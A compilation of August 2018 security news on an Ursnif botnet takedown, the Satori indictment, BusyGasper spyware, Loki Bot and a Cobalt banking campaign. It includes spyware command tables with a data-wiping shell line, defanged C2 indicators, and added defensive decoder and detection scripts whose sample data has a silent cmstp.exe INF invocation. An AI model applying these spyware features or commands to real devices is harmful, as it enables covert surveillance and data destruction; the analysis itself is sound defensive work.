Once “in”, a new need arose: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure, it was possible to get access to the entire VPS control panel. At this point the general infrastructure picture* was clear, and so was how to block the threat, not only for customers but for everybody!

Attacker VPS Environment

Sharing these results for free would enable vendors (for example AV companies, firewall companies, IDS companies and so on) to update their signatures and block this threat for everybody all around the world. I am sure that this work will not stop malicious actors, BUT at least we might raise our voice against cyber criminals!

In this post, I described the main steps that took me to gain full access to a big Ursnif/Gozi botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on the attacker infrastructure). The threat appeared very well structured: Docker containers were adopted to automate the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found, and the entire infrastructure was probably set up by a criminal organisation and not by a single person.
The following graph shows the victim distribution in August 2018. The main target is currently the USA, with 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims in August 2018 number several thousand.

Victims Distribution on August 24 2018

During the analysis it was interesting to observe that the attacker was acquiring domains from an apparent “black market” where many actors were selling and buying “apparently compromised domains” (no evidence for this last sentence, only a feeling). The system (following picture) looks like a trading platform with a public API that third-party systems can operate, much like stock operators.

Apparent Domain BlackMarket
Hope you enjoyed the reading.

Further details, including the Indicators of compromise, are reported in the analysis published by Marco Ramilli on his blog.

Federal prosecutors indicted a 20-year-old man who built the Satori botnet
31.8.2018 securityaffairs BotNet

A youngster (20) from Washington was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a Mirai variant dubbed Satori.
MalwareMustDie Team: “It’s time for every teenager or young man to know that playing with malware is the fastest way to finish in the jail”

Mirai, Mirai and again Mirai: after the source code was leaked online, gangs of teenagers have been engaged in a new playground. Based on a (solid) software infrastructure, Mirai is still able to work well and to be lethal, also because the effort to update it is not titanic and the skills of the hacker can be modest. In other words, infecting the planet nowadays is (still) very easy and the attack pattern seems clear: download the Mirai source code, change the exploits, and everything works fine. But this time the story did not have a happy ending.

The news comes from the legendary Kevin Poulsen who has posted the news on the Daily Beast reporting that “a 20-year-old Washington man was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a notorious botnet tearing through routers around the world.”

“last December, researchers at the Check Point cybersecurity firm traced Satori to an amateur known as “Nexus Zeta” who frequented a web forum for untrained and wannabe malicious hackers. Two months later, a little-noticed Pastebin post by rival hackers purported to reveal Nexus Zeta’s real identity, naming the same Kenneth Schuchman indicted last week.” wrote Poulsen.

Then Kenneth Schuchman, who “lives in Vancouver, Washington with his father”, is now indicted, even if the indictment doesn’t name the malware, but “all signs point to the virulent Satori botnet that surfaced last fall, and has infected at least 500,000 internet routers around the world”, added Kevin Poulsen.

The activity of the Satori botnet was observed by Check Point at the end of 2017; below are the findings included in a report published by the firm.

“A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousands of attempts to exploit it have already been found in the wild.
The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai.
The suspected threat actor behind the attack has been identified by his nickname, ‘Nexus Zeta’.” states the report published by Check Point.

The strange thing about those wannabe hackers is that their emotional background plays a crucial role during the investigation: as Mr. Poulsen reports, Kenneth Schuchman wrote on Facebook in 2015 regarding Pokemon Go: “I do black hat hacking all the time and I haven’t even downloaded this game let alone played it.” From “black hat hacking all the time” to jail, the step is short.

I asked Odisseus, an Italian member of the MalwareMustDie team, for a quick comment. MalwareMustDie members have been fighting malware for a long time, and the group was the first in the world to discover and analyze Mirai, in late August 2016, thanks to the excellent reverse engineering skills of their head @unixfreaxjp.

“It’s been two years since Mirai has been discovered and it’s still able to infect thousands of routers around the world: but this news appears like a symbolic anniversary. It is very important to give space to this kind of news because every teenager or young man needs to know that playing with malware is the fastest way to finish in jail”.

BusyGasper – the unfriendly spy
31.8.2018 Kaspersky Android
In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that, as it turned out, belonged to an unknown spyware family. Further investigation showed that the malware, which we named BusyGasper, is not all that sophisticated, but demonstrates some unusual features for this type of threat. From a technical point of view, the sample is a unique spy implant with stand-out features such as device sensors listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver. As a modern Android spyware it is also capable of exfiltrating data from messaging applications (WhatsApp, Viber, Facebook). Moreover, BusyGasper boasts some keylogging tools – the malware processes every user tap, gathering its coordinates and calculating characters by matching given values with hardcoded ones.

The sample has a multicomponent structure and can download a payload or updates from its C&C server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware. In addition, the malware can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.

This particular operation has been active since approximately May 2016 up to the present time.

Infection vector and victims
While looking for the infection vector, we found no evidence of spear phishing or any of the other common vectors. But some clues, such as the existence of a hidden menu for operator control, point to a manual installation method – the attackers used physical access to a victim’s device to install the malware. This would explain the number of victims – there are fewer than 10 of them and, according to our detection statistics, they are all located in Russia.

Intrigued, we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices. Several TXT files with commands on the attacker’s FTP server contain a victim identifier in the names that was probably added by the criminals:

Some of them sound like Russian names: Jana, SlavaAl, Nikusha.

As we know from the FTP dump analysis, there was a component from ASUS firmware, indicating the attacker’s interest in ASUS devices, which explains the victim file name that mentions “ASUS”.

Information gathered from the email account provides a lot of the victims’ personal data, including messages from IM applications.

Gathered file | Type | Description
lock | Text | Implant log
ldata | sqlite3 | Location data based on network (cell_id)
gdata | sqlite3 | Location data based on GPS coordinates
sdata | sqlite3 | SMS messages
f.db | sqlite3 | Facebook messages
v.db | sqlite3 | Viber messages
w.db | sqlite3 | WhatsApp messages
Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US$10,000. But as far as we know, the attacker behind this campaign is not interested in stealing the victims’ money.

We found no similarities to commercial spyware products or to other known spyware variants, which suggests BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware.

Technical details
Here is the meta information for the observed samples, certificates and hardcoded version stamps:

Certificate 1
  Serial Number: 0x76607c02
  Issuer: CN=Ron
  Validity: from Tue Aug 30 13:01:30 MSK 2016 to Sat Aug 24 13:01:30 MSK 2041
  Subject: CN=Ron
  Samples signed with it (MD5 | Module | Version):
    9e005144ea1a583531f86663a5f14607 | 1 | –
    18abe28730c53de6d9e4786c7765c3d8 | 2 | 2.0

Certificate 2
  Serial Number: 0x6a0d1fec
  Issuer: CN=Sun
  Validity: from Mon May 16 17:42:40 MSK 2016 to Fri May 10 17:42:40 MSK 2041
  Subject: CN=Sun
  Samples signed with it (MD5 | Module | Version):
    9ffc350ef94ef840728564846f2802b0 | 2 | v2.51sun
    6c246bbb40b7c6e75c60a55c0da9e2f2 | 2 | v2.96s
    7c8a12e56e3e03938788b26b84b80bd6 | 2 | v3.09s
    bde7847487125084f9e03f2b6b05adc3 | 2 | v3.12s
    2560942bb50ee6e6f55afc495d238a12 | 2 | v3.18s
It’s interesting that the issuer “Sun” matches the “Sun1” and “Sun2” identifiers of infected devices from the FTP server, suggesting they may be test devices.

The analyzed implant has a complex structure, and for now we have observed two modules.

First (start) module
The first module, which was installed on the targeted device, could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server:

@install command

As can be seen from the screenshot above, a new component was copied in the system path, though that sort of operation is impossible without root privileges. At the time of writing we had no evidence of an exploit being used to obtain root privileges, though it is possible that the attackers used some unseen component to implement this feature.

Here is a full list of possible commands that can be executed by the first module:

Command name | Description
@stop | Stop IRC
@quit | System.exit(0)
@start | Start IRC
@server | Set IRC server (default value is “”), port is always 6667
@boss | Set IRC command and control nickname (default value is “ISeency”)
@nick | Set IRC client nickname
@screen | Report every time when screen is on (enable/disable)
@root | Use root features (enable/disable)
@timer | Set period of IRCService start
@hide | Hide implant icon
@unhide | Unhide implant icon
@run | Execute specified shell
@broadcast | Send command to the second module
@echo | Write specified message to log
@install | Download and copy specified component to the system path
The implant uses a complex intent-based communication mechanism between its components to broadcast commands:

Approximate graph of relationships between BusyGasper components

Second (main) module
This module writes a log of the command execution history to the file named “lock”, which is later exfiltrated. Below is a fragment of such a log:

Log with specified command

Log files can be uploaded to the FTP server and sent to the attacker’s email inbox. It’s even possible to send log messages via SMS to the attacker’s number.

As the screenshot above shows, the malware has its own command syntax that represents a combination of characters while the “#” symbol is a delimiter. A full list of all possible commands with descriptions can be found in Appendix II below.

The malware has all the popular capabilities of modern spyware. Below is a description of the most noteworthy:

The implant is able to spy on all available device sensors and to log registered events. Moreover, there is a special handler for the accelerometer that is able to calculate and log the device’s speed:

This feature is used in particular by the command “tk0” that mutes the device, disables keyguard, turns off the brightness, uses wakelock and listens to device sensors. This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state. As soon as the user picks up the device, the implant will detect a motion event and execute the “tk1” and “input keyevent 3” commands.

“tk1” will disable all the effects of the “tk0” command, while “input keyevent 3” is the shell command that simulates the pressing of the ‘home’ button so all the current activities will be minimized and the user won’t suspect anything.

Location services to enable (GPS/network) tracking:

The email command and control protocol. The implant can log in to the attacker’s email inbox, parse emails for commands in a special “Cmd” folder and save any payloads to a device from email attachments.

Accessing the “Cmd” folder in the attacker’s email box

Moreover, it can send a specified file or all the gathered data from the victim device via email.

Emergency SMS commands. If an incoming SMS contains one of the following magic strings: ” 2736428734″ or ” 7238742800″ the malware will execute multiple initial commands:

Keylogger implementation
Keylogging is implemented in an original manner.

Immediately after activation, the malware creates a textView element in a new window with the following layout parameters:

All these parameters ensure the element is hidden from the user.

Then it adds onTouchListener to this textView and is able to process every user tap.

Interestingly, there is a whitelist of tapped activities:

The listener can operate with only coordinates, so it calculates pressed characters by matching given values with hardcoded ones:

Additionally, if there is a predefined command, the keylogger can make a screenshot of the tapped display area:

Manual access and operator menu
There is a hidden menu (Activity) for controlling implant features that looks like it was created for manual operator control. To activate this menu the operator needs to call the hardcoded number “9909” from the infected device:

A hidden menu then instantly appears on the device display:

The operator can use this interface to type any command for execution. It also shows a current malware log.

FTP server
The attackers used ftp://213.174.157[.]151/ as a command and control server. The IP belongs to the free Russian web hosting service Ucoz.

Files Description
CMDS*.txt Text files with commands to execute
supersu.apk SuperSU(eu.chainfire.supersu) tool
us.x SuperSU ELF binaries
supersu.cfg.old SuperSU configs with spyware implant mention
bb.txt BusyBox v1.26.2 ELF file
bdata.xml Config file for excluding malware components from Android battery saver feature Doze
bdatas.apk Main implant module Start implant module
MobileManagerService.apk ASUS firmware system component (clean)
mobilemanager.apk Corrupted archive
privapp.txt Looks like a list of system applications (including spyware components) from the infected device
run-as.y Run-as tool ELF file
SuperSU config fragment for implant components and the busybox tool supersu.cfg:

This config allows the implant to use all root features silently.

Content of bdata.xml file:

It can be added to the /system/etc/sysconfig/ path to whitelist specified implant components from the battery saving system.

Email account
A Gmail account with password is mentioned in the sample’s code:

It contains the victim’s exfiltrated data and “cmd” directory with commands for victim devices.

Appendix I: Indicators of compromise


Appendix II: List of all possible commands
These values are valid for the most recently observed version (v3.18s).

Decimal | Char | Description
33 | ! | Interrupt previous command execution
36 | $ | Make a screenshot
48 | 0 | Execute following shell: rm c/*; rm p/*; rm sdcard/Android/system/tmp/r/* (wipe environment paths?)
63 | ? | Log device info and implant meta information
66(98) | B(b) | Broadcast specified command to another component
67(99) | C(c) | Set specified command on timer to execute
68(100) 65(97) | D(d) A(a) | Log last 10 tasks by getRecentTasks api
68(100) 83(115) | D(d) S(s) | Log info about device sensors (motion, air temperature and pressure, etc.)
68(100) 84(116) | D(d) T(t) | Log stack trace and thread information
GPS module
101 | e | Broadcast command to GPS-tracking external component
71(103) | G(g) | Location tracking GPS/network
Interaction with operators
73(105) 102 114 | I(i) f r | Get specified file from FTP (default – CMDS file with commands)
73(105) 102 115 | I(i) f s | Upload exfiltrated data
73(105) 73(105) | I(i) I(i) | Start/stop IRC service
73(105) 76(108) | I(i) L(l) | Send current location to IRC
73(105) 77(109) | I(i) M(m) | Push specified message to IRC
73(105) 82(114) | I(i) R(r) | Read commands from the email inbox
73(105) 83(115) | I(i) S(s) | Send specified file or all gathered data in email with UID as a subject
Network geolocation
76(108) | L(l) | Get info on current cell_id
Camera features
77(109) 99 | M(m) c | Capture photo
77(109) 108 | M(m) l | Log information about available cameras
77(109) 114 97 | M(m) r a | Start/stop audio recording (default duration – 2 minutes)
77(109) 114 98 | M(m) r b | Start/stop audio recording with specified duration
77(109) 114 44(114) | M(m) r ,(r) | Start fully customizable recording (allow to choose specific mic etc.)
77(109) 114 115 | M(m) r s | Stop previous recording
77(109) 114 116 | M(m) r t | Set recording duration
77(109) 118 | M(m) v | Capture video with specified duration and quality
79(111) 102 | O(o) f | Hard stop of implant services, unregister receivers
79(111) 110 | O(o) n | Start main implant service with all components
80(112) | P(p) | Find specified images and scale them with “inSampleSize” API
81(113) | Q(q) | Stop main implant service
82(114) | R(r) | Execute specified shell command
Shared preferences setup
83(115) 33 | S(s) ! | On/off hidden operator activity
83(115) 61 | S(s) = | Shared preferences control (set/remove specified value)
83(115) 98 | S(s) b | On/off sending SMS message after device boot
83(115) 99 | S(s) c | Put boolean value in shared preference “cpyl”
83(115) 100 | S(s) d | Put boolean value in shared preference “dconn”
83(115) 101 | S(s) e | On/off periodically reenabling data connectivity
83(115) 102 | S(s) f | Set GPS location update period
83(115) 105 | S(s) i | Put boolean value in shared preference “imsg”
83(115) 108 97 | S(s) l a | On/off foreground process activity logging
83(115) 108 99 | S(s) l c | Start watching on captured photos and videos
83(115) 108 102 | S(s) l f | Start watching on Facebook messenger database changes
83(115) 108 108 | S(s) l l | On/off browser history logging
83(115) 108 116 | S(s) l t | Start watching on Telegram messenger cache database changes
83(115) 108 118 | S(s) l v | Start watching on Viber messenger database changes
83(115) 108 119 | S(s) l w | Start watching on WhatsApp messenger database changes
83(115) 109 | S(s) m | On/off sending log SMS messages
83(115) 110(112) | S(s) o(p) | Set operator telephone number (for SMS logging)
83(115) 113 | S(s) q | Set implant stop-mode (full or only main service)
83(115) 114 | S(s) r | On/off execution shell as root
83(115) 115 | S(s) s | On/off screen state logging
83(115) 116 | S(s) t | On/off screen touches logging and number of related screenshots
83(115) 117 | S(s) u | On/off debug logging mode with system thread info
83(115) 120 | S(s) x | Use FTP connection via busybox or default Socket API
Sensor and display control
84(116) 98 | T(t) b | On/off screen brightness
84(116) 100 | T(t) d | On/off network data (internet)
84(116) 75(107) 48 | T(t) K(k) 0 | Mute, turn off brightness, disable keyguard, use wakelock and listen on device sensors.
84(116) 75(107) 49 | T(t) K(k) 1 | Disable features from previous command
84(116) 75(107) 50 | T(t) K(k) 2 | Disable Keyguard instance
84(116) 75(107) 51 | T(t) K(k) 3 | Write “userActivity” to log
84(116) 115 48 | T(t) s 0 | Disable sensor listener
84(116) 115 49 | T(t) s 1 | Register listener for specified sensor
84(116) 115 108 | T(t) s l | Log int value from file /dev/lightsensor
84(116) 119 48 | T(t) w 0 | Turn WiFi off
84(116) 119 49 | T(t) w 1 | Turn WiFi on
84(116) 119 108 | T(t) w l | Control WiFi lock
Common backdoor commands
85(117) | U(u) | Download payload, remount “system” path and push payload there. Based on the code commentaries, this feature might be used to update implant components
87(119) | W(w) | Send SMS with specified text and number
Updates from the newest version
122 33 | z ! | Reboot device
122 99 | z c | Dump call logs
122 102 | z f p | Send gathered data to FTP
122 102 | z f g | Get CMDS* text file and execute contained commands
122 103 | z g | Get GPS location (without log, only intent broadcasting)
122 108 102 | z l f | Dump Facebook messages during specified period
122 108 116 | z l t | Dump Telegram cache
122 108 118 | z l v | Dump Viber messages during specified period
122 108 119 | z l w | Dump WhatsApp messages during specified period
122 110 | z n | Get number of all SMS messages
122 111 | z o | Set ringer mode to silent
122 112 | z p | Open specified URL in webview
122 114 | z r | Delete all raw SMS messages
122 116 | z t | Set all internal service timers
122 122 | z z | Remove shared preferences and restart the main service
126 | ~ | On/off advanced logging mode with SMS and UI activity
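As an added example (not code from the Kaspersky report), the decoder below applies the command syntax described for the second (main) module, character combinations separated by "#", to a subset of the Appendix II table, so an analyst triaging a captured CMDS*.txt file or "lock" log can read it without the table at hand. The assumption that any text after the matched command letters is that command's argument, and the sample command string, are mine and are not stated on the page.

```python
"""Decoder for BusyGasper second-module command strings.

Added example, not code from the Kaspersky report. It applies the "#"
delimiter rule from the second-module description to a subset of the
Appendix II table. Assumption (not stated on the page): any text after the
matched command letters is that command's argument. The sample is constructed.
"""
from typing import List, Optional, Tuple

# Subset of Appendix II. Each pattern is a tuple of allowed characters per
# position; the table's "X(x)" notation means either case is accepted there.
COMMAND_TABLE: List[Tuple[Tuple[str, ...], str]] = [
    (("!",), "Interrupt previous command execution"),
    (("$",), "Make a screenshot"),
    (("?",), "Log device info and implant meta information"),
    (("Rr",), "Execute specified shell command"),
    (("Uu",), "Download payload, remount system path and push payload there"),
    (("Ww",), "Send SMS with specified text and number"),
    (("Ii", "f", "r"), "Get specified file from FTP"),
    (("Ii", "f", "s"), "Upload exfiltrated data"),
    (("Ii", "Ii"), "Start/stop IRC service"),
    (("Ii", "Ss"), "Send specified file or all gathered data in email"),
    (("Mm", "c"), "Capture photo"),
    (("Mm", "r", "a"), "Start/stop audio recording (default 2 minutes)"),
    (("Mm", "r", "b"), "Start/stop audio recording with specified duration"),
    (("Ss", "!"), "On/off hidden operator activity"),
    (("Ss", "l", "w"), "Start watching on WhatsApp messenger database changes"),
    (("Ss", "m"), "On/off sending log SMS messages"),
    (("Tt", "Kk", "0"), "Mute, turn off brightness, disable keyguard, use wakelock and listen on device sensors"),
    (("Tt", "Kk", "1"), "Disable features from previous command"),
    (("Tt", "w", "0"), "Turn WiFi off"),
    (("z", "!"), "Reboot device"),
    (("z", "l", "w"), "Dump WhatsApp messages during specified period"),
    (("z", "r"), "Delete all raw SMS messages"),
]

# Longest patterns first, so "ifr" is tried before the two-character "ii" form.
_PATTERNS = sorted(COMMAND_TABLE, key=lambda entry: len(entry[0]), reverse=True)


def _matches(pattern: Tuple[str, ...], text: str) -> bool:
    """True when every position of `pattern` accepts the character at that index."""
    if len(text) < len(pattern):
        return False
    return all(ch in allowed for ch, allowed in zip(text, pattern))


def decode_command(raw: str) -> Tuple[Optional[str], str]:
    """Return (description, argument) for one command.

    description is None when the prefix is not in the (subset) table; the
    whole string is then returned as the argument so nothing is silently lost.
    """
    raw = raw.strip()
    for pattern, description in _PATTERNS:
        if _matches(pattern, raw):
            return description, raw[len(pattern):].strip()
    return None, raw


def decode_cmds_file(text: str) -> List[Tuple[str, Optional[str], str]]:
    """Split a CMDS-style string on the "#" delimiter and decode each part."""
    rows: List[Tuple[str, Optional[str], str]] = []
    for part in text.split("#"):
        part = part.strip()
        if not part:
            continue
        description, argument = decode_command(part)
        rows.append((part, description, argument))
    return rows


# Constructed sample, not a real file from the C2 server.
SAMPLE_CMDS = "tk0#ifr#slw#R id#zlw 2018-08-01 2018-08-24#tk1#xyz"

if __name__ == "__main__":
    for raw, description, argument in decode_cmds_file(SAMPLE_CMDS):
        print(f"{raw!r:30} -> {description or 'UNKNOWN'}  arg={argument!r}")
```

Unknown prefixes (None) are worth keeping in the output: a command the table does not cover may mean a newer implant version than v3.18s.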

Loki Bot: On a hunt for corporate passwords

31.8.2018 Kaspersky  BotNet

Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot. The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.

ISO images are copies of optical discs that can be mounted in a virtual CD/DVD drive to be used in the same way as the originals. Whereas in days of yore users needed dedicated software to open this type of image, today’s operating systems support the format out of the box, and if you want to access the contents of the file, all you need to do is double-click. Malicious spam uses this type of file as a container for delivering malware, albeit rarely.

As mentioned above, hackers were sending out copies of Loki Bot to company email addresses that could be obtained from public sources or from the companies’ own websites.

The emailed messages were notably diverse:

Fake notifications from well-known companies

Imitating messages from well-known corporations is one of the most popular tricks in the hackers’ arsenal. Interestingly enough, fake emails used to be directed mostly at common users and customers, whereas now companies are increasingly the target.

Fake notifications containing financial documents

The scammers passed off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually no more than a few lines and the subject mentioning what exactly is purported to be attached.

Fake orders or offers

Phishers may pose as customers placing an order, or a vendor offering their goods or services.

Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why today it’s essential for corporate security measures to include both technical protection and training for employees, because their actions may cause irreparable damage to the business.

New Cobalt Campaign Targets Russian and Romanian Banks
31.8.2018 securityweek CyberCrime

A new campaign by the Russia-based Cobalt hacking group was observed on August 13, 2018. Cobalt is best-known for targeting financial institutions, and this campaign is no different. Two targets have been identified to date: NS Bank in Russia and Carpatica/Patria in Romania.

Cobalt has been operating since at least 2016. So far it is credited with the theft of $9.7 million from the Russian Metallinvestbank; ATM thefts of $2.18 million from Taiwan banks; a SWIFT attack on Russian banks; and more than 200 other attacks on banks in Europe, Thailand, Turkey and Taiwan. Last year it was reported that Cobalt had expanded its range into also targeting government, telecom/Internet, service providers, manufacturing, entertainment, and healthcare organizations, often using government organizations and ministries as a stepping stone for other targets.

A common theme for Cobalt is to start with spear-phishing emails to gain the initial entry. In financial attacks, the emails usually masquerade as other financial institutions or a financial supplier/partner domain to gain the target's trust.

In an analysis of the new campaign, Netscout's ASERT researchers show numerous parallels with known Cobalt TTPs and tools -- but with one new divergence. One of the phishing emails it has discovered contains two separate malicious URLs. The first is a weaponized Word document, while the second is a binary with a .jpg extension.

The researchers have uncovered two malware samples that connect the new campaign to Cobalt. The first was a JavaScript backdoor that shares functionality with other backdoors. The second is COOLPANTS, a reconnaissance backdoor linked to Cobalt and originally found by researcher Szabolcs Schmidt. The new report notes that COOLPANTS appears to be an evolution of CobInt -- 28 of its 57 functions match under the comparison tool Diaphora. Furthermore, COOLPANTS connects to hxxps://apstore[.]info, which Proofpoint describes as a Cobalt C2.

On 13 August 2018, ASERT found a new sample almost identical to COOLPANTS. It was compiled at the same time on 1 August 2018. Its 48 functions match those in COOLPANTS under the 'Best Match' tab in Diaphora. This sample, however, has rietumu[.]me as its C2. Inspecting rietumu[.]me, ASERT found the email address, solisariana[@]protonmail[.]com. Pivoting from this address, it found five more new domains all created on 1 August 2018.

The domains are compass[.]plus; eucentalbank[.]com; europecentalbank[.]com; inter-kassa[.]com; and unibank[.]credit. Each one is clearly designed to masquerade as the domain of a financial services organization. The real Interkassa, for example -- and according to its genuine website -- is a payments processing firm based in Ukraine.

The researchers used the inter-kassa domain and searched for samples. They found a spear-phishing email that bears all the hallmarks of a Cobalt campaign, dated 2 August 2018. It is addressed to bulavina AT ns-bank DOT ru and sent by "Interkassa" <denis AT inter-kassa DOT com>. Interestingly, LinkedIn lists a Denys Kyrychenko as co-owner and CTO of Interkassa.

It is this email that provides two embedded malicious links. One calls a weaponized Word document with an embedded VBA script. If macros are allowed, the script generates a cmd.exe command that launches cmstp.exe with an INF file. The INF file beacons back to the C2 to download a payload that is executed by cmstp.exe.
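Detection logic for the macro chain just described (Word document, cmd.exe, cmstp.exe given an INF file), as an added example that is not ASERT's or Netscout's code. The process-creation events are constructed samples in a Sysmon-like JSON-lines shape; the field names, the list of user-writable directories and the cmstp.exe switches /ni and /s (the commonly documented way to run an INF without UI) are assumptions, not details quoted from the page.

```python
"""Detection of the cmd.exe -> cmstp.exe -> INF chain described for the
Cobalt spear-phishing document.

Added example, not ASERT's or Netscout's code. Events are constructed
Sysmon-like JSON lines; field names, the user-writable path markers and the
cmstp.exe switches /ni and /s are assumptions, not quoted from the page.
"""
import json
from typing import Dict, List

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Heuristic: directories a macro can normally write to (assumed, not exhaustive).
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'WINWORD.EXE' -> 'winword.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _reasons(ev: Dict) -> List[str]:
    """Return the suspicious traits of one event (empty list means no alert)."""
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent_image", ""))
    cmdline = ev.get("cmdline", "").lower()
    tokens = cmdline.split()
    reasons: List[str] = []

    # Step 1 of the chain: the document's VBA builds a cmd.exe line naming cmstp.exe.
    if image == "cmd.exe" and parent in OFFICE_IMAGES and "cmstp" in cmdline:
        reasons.append(f"{parent} spawned cmd.exe invoking cmstp.exe")

    # Step 2: cmstp.exe itself, handed an INF file that will beacon for the payload.
    if image == "cmstp.exe" and ".inf" in cmdline:
        if parent == "cmd.exe" or parent in OFFICE_IMAGES:
            reasons.append(f"cmstp.exe spawned by {parent}")
        if any(marker in cmdline for marker in USER_WRITABLE_MARKERS):
            reasons.append("INF file in user-writable path")
        if "/ni" in tokens and "/s" in tokens:
            reasons.append("silent INF install switches")
    return reasons


def analyze(events_jsonl: str) -> List[Dict]:
    """Scan JSON-lines process events; return one alert per suspicious event."""
    alerts: List[Dict] = []
    for line in events_jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = _reasons(ev)
        if not reasons:
            continue
        # A parent-chain hit or two independent traits is enough to call it high.
        high = len(reasons) >= 2 or any("spawned" in r for r in reasons)
        alerts.append({
            "ts": ev.get("ts"),
            "host": ev.get("host"),
            "image": _basename(ev.get("image", "")),
            "severity": "high" if high else "medium",
            "reasons": reasons,
        })
    return alerts


# Constructed sample telemetry (not real events); paths are placeholders.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2018-08-02T09:14:02Z", "host": "ws-17",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "cmdline": "cmd.exe /c cmstp.exe /ni /s C:\\Users\\u\\AppData\\Local\\Temp\\inv.inf"},
    {"ts": "2018-08-02T09:14:03Z", "host": "ws-17",
     "image": "C:\\Windows\\System32\\cmstp.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmstp.exe /ni /s C:\\Users\\u\\AppData\\Local\\Temp\\inv.inf"},
    # Plausible administrative use: launched from the shell, INF under System32.
    {"ts": "2018-08-02T10:02:11Z", "host": "ws-03",
     "image": "C:\\Windows\\System32\\cmstp.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "cmstp.exe C:\\Windows\\System32\\ras\\vpnprofile.inf"},
    {"ts": "2018-08-02T10:05:40Z", "host": "ws-03",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe"},
])

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert["ts"], alert["host"], alert["severity"], "; ".join(alert["reasons"]))
```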

The eventual JavaScript backdoor -- named 'more_eggs' -- is almost identical to the backdoor analyzed by Trend Micro this time last year and attributed to Cobalt. Both provide five commands that essentially allow attackers to take over an infected system.

These commands are d&exec (downloads and executes a PE file); more_eggs (downloads an update for itself); gtfo (deletes itself and related registry entries); more_onion (executes the 'new' copy of itself); and vai_x (executes a command via cmd). Only the last command differs between the two versions, with the earlier one having the name more_power for vai_x.

The second URL in the spear-phishing email, with a dot-jpg filename, downloads an executable rather than an image file. This also ultimately beacons to its C2 server, which was not -- at the time of analysis -- responding.

ASERT is confident that this, and another campaign discovered by Intel471 targeting Romanian carpatica[.]ro by masquerading as Single Euro Payments Area (SEPA), are both the work of the Cobalt group. Only the use of two separate infection points in one email with two separate C2s makes this campaign unusual. "One could speculate that this would increase the infection odds," comments the report -- for example, if Word macros are successfully disallowed by the target, he or she might still succumb to the disguised jpg.

"ASERT believes," says the report, "Cobalt Group will continue targeting financial organizations in Eastern Europe and Russia based on the observables in this campaign and their normal modus operandi." It is worth mentioning that Trend Micro has suggested that COBALT starts by targeting Russia and the old USSR states to test out its methodology before moving on to European and other targets.

ASERT is the threat intelligence team of Arbor Networks, which is the security division of NETSCOUT.

What Happens to Whistleblowers After They Blow the Whistle?
31.8.2018 securityaffairs  IT

Whistleblowers are a controversial subgroup of the modern workforce. What happens to whistleblowers after they reveal uncomfortable truths?
Whistleblowers are a controversial subgroup of the modern workforce. Although their intentions are often pure and they frequently uncover wrongdoings or shortcomings in their particular niche, there are usually some consequences too.

Complicating matters even further is the relative ease of reporting suspected misdeeds in the 21st century. Uncovering wrongdoings in the past often stemmed from hands-on experience with a company — and it usually took years to build a case.

With the popularity of the internet, whistleblowers are now emerging in the most unlikely of places. Now it only takes seconds to spread the word about a company’s misdeeds — whether they’re true or not.

Immediate Consequences

Although whistleblowers are guarded in the United States by the Whistleblower Protection Act of 1989, the amount of protection is minimal — and it doesn’t provide any coverage for the potential fallout of blowing the whistle.

Per a 1990 survey by McMillan, 90 percent of U.S.-based whistleblowers lost their jobs or received demotions, and 27 percent faced legal issues — including defamation. On the darker side, 10 percent eventually attempted suicide as a result of their actions. Another survey, conducted by Whistleblowers Australia (WBA) in 1993, revealed similar numbers.

According to the WBA’s survey, companies often use informal or subversive tactics to punish a whistleblower who remains a part of their organization after the fact. Common strategies include isolation from workplace or industry peers, removal of normal work duties and responsibilities and other disciplinary actions.

Most states have also enacted laws and anti-retaliation clauses for whistleblowers, but these protections only go so far. They also require the whistleblower to prove that the retaliation is a direct result of their whistleblowing, and that’s not always an easy task.

